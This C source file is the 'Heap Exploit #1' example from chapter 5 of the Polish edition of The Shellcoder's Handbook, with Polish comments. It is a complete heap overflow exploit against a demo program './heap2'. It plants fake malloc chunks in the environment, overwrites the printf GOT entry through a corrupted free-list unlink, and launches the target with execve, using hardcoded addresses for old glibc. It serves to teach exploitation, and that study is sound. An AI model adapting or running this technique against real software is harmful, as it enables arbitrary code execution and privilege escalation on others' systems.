/*

The Shellcoder's Handbook. Edycja polska
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
Sinan Eren, Neel Mehta, Riley Hassell
Wydawnictwo Helion


Rozdzia 5
Wprowadzenie do metod przepenienia sterty
Heap Exploit #1

Komentarze i uwagi prosz przesya na adres jack@infosecinstitute.com 
lub za porednictwem witryny http://www.infosecinstitute.com 

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define VULN "./heap2"

#define XLEN 1040 /* 1024 + 16 */
#define ENVPTRZ 512 /* wystarczajco duy obszar */

/* mov %ecx,0x8(PRINTF_GOT) */

#define PRINTF_GOT 0x08049648 - 8 

/* wartoci 13 i 21 dziaaj dla Mandrake 9, w przypadku glibc 2.2.5 naley je zmodyfikowa tak, by
   wskazywany by ostatecznie adres 0x408 (lub 0xfffffffc, dla niektrych wersji glibc). 
   Uzyskany adres nie moe mie ustawionych dwch najmodszych bitw. */

#define CHUNK_ENV_ALLIGN 17 
#define CHUNK_ENV_OFFSET 1056-1024

/* funkcja adujca rodowisko */

unsigned int
ptoa(char **envp, char *string, unsigned int total_size)
{
  char *p;
  unsigned int cnt;   
  unsigned int size;
  unsigned int i;

  p = string;
  cnt = size = i = 0;
  for (cnt = 0; size < total_size; cnt ++) 
  {
    envp[cnt] = (char *) malloc(strlen(p) + 1);
    envp[cnt] = strdup(p);

#ifdef DEBUG

    fprintf(stderr, "[*] strlen: %d\n", strlen(p) + 1);
    for (i = 0; i < strlen(p) + 1; i ++) fprintf(stderr, "[*] %d: 0x%.02x\n", i, p[i]);

#endif

    size += strlen(p) + 1;
    p += strlen(p) + 1;
  }
  return cnt;
}


int main(int argc, char **argv)
{
  unsigned char *x;
  char *ownenv[ENVPTRZ];
  unsigned int xlen;
  unsigned int i;
  unsigned char chunk[2048 + 1]; 

  
  unsigned char *exe[3];
  unsigned int env_size;
  unsigned long retloc;
  unsigned long retval;
  unsigned int chunk_env_offset;
  unsigned int chunk_env_align;

  xlen = XLEN + (1024 - (XLEN - 1024));
  chunk_env_offset = CHUNK_ENV_OFFSET; 
  chunk_env_align = CHUNK_ENV_ALLIGN;   
  exe[0] = VULN;
  exe[1] = x = malloc(xlen + 1);
  exe[2] = NULL;
  if (!x) exit(-1);

  fprintf(stderr, "\n[*] Options: [ <environment chunk alignment> ] [ <enviroment chunk offset> ]\n\n");
  if (argv[1] && (argc == 2 || argc == 3)) chunk_env_align = atoi(argv[1]); 
  if (argv[2] && argc == 3) chunk_env_offset = atoi(argv[2]); 
  fprintf(stderr, "[*] using align %d and offset %d\n", chunk_env_align, chunk_env_offset);
  retloc = PRINTF_GOT; 

  /* printf GOT - 0x8 ... tutaj zapisana zostanie zawarto ecx czyli wskanik fragmentu*/ 
  /* w przyapadku glibc 2.2 skok moe by wykonany do dowolnej pozycji na stosie (w celu demonstracyjnym) */

  retval=0xbffffd40;
  fprintf(stderr, "[*] Using retloc: %p\n", retloc);
  memset(chunk, 0x00, sizeof(chunk));
  for (i = 0; i < chunk_env_align; i ++) chunk[i] = 'X';
  for (i = chunk_env_align; i <= sizeof(chunk) - (16 + 1); i += (16))
  {
    *(long *)&chunk[i] = 0xfffffffc; 
    *(long *)&chunk[i + 4] = (unsigned long)1032; /* S == chunksize(FD) ... przerywa ptl (size == 1024 + 8) */ 
    /*retval nie jest uywany dla wersji 2.3 */
    *(long *)&chunk[i + 8] = retval; 
    *(long *)&chunk[i + 12] = retloc; /* printf GOT - 8..mov %ecx,0x8(%eax) */
  }

#ifdef DEBUG

  for (i = 0; i < sizeof(chunk); i++) fprintf (stderr, "[*] %d: 0x%.02x\n", i, chunk[i]);

#endif
  memset(x, 0xcc, xlen);
  *(long *)&x[XLEN - 16] = 0xfffffffc;
  *(long *)&x[XLEN - 12] = 0xfffffff0;
  /* zarwno fd jak i bk wskazuj etykiet sfingowanego fragmentu ... 
     nie jest wic istotne, ktry z nich zostanie uyty */

  /* odejmujemy 1024 czyli dugo naszego bufora, za ktrym bedziemy dokonywa zapisu
   * co mona zaobserwowa ledzc wykonanie programu. */

  *(long *)&x[XLEN - 8] = ((0xc0000000 - 4) - strlen(exe[0]) - chunk_env_offset-1024);  
  *(long *)&x[XLEN - 4] = ((0xc0000000 - 4) - strlen(exe[0]) - chunk_env_offset-1024);
  printf("Our fake chunk (0xfffffffc) needs to be at %p\n",((0xc0000000 - 4) - strlen(exe[0]) - chunk_env_offset)-1024);

  /* naleaoby umieci kod powoki pod pewnym adresem x i wykona skok bezporednio pod ten adres 
     w przeciwnym razie uruchomiona zostanie zawarto stosu czyli nic interesujcego (dla glibc 2.2) */

  /* czyci tablic rodowiska */

  for (i = 0; i < ENVPTRZ; i++) ownenv[i] = NULL; 
  i = ptoa(ownenv, chunk, sizeof(chunk));
  fprintf(stderr, "[*] Size of enviroment array: %d\n", i);
  fprintf(stderr, "[*] Calling: %s\n\n", exe[0]);

  if (execve(exe[0], (char **)exe, (char **)ownenv)) 
  {
    fprintf(stderr, "Error executing %s\n", exe[0]);
    free(x);
    exit(-1); 
  }
}




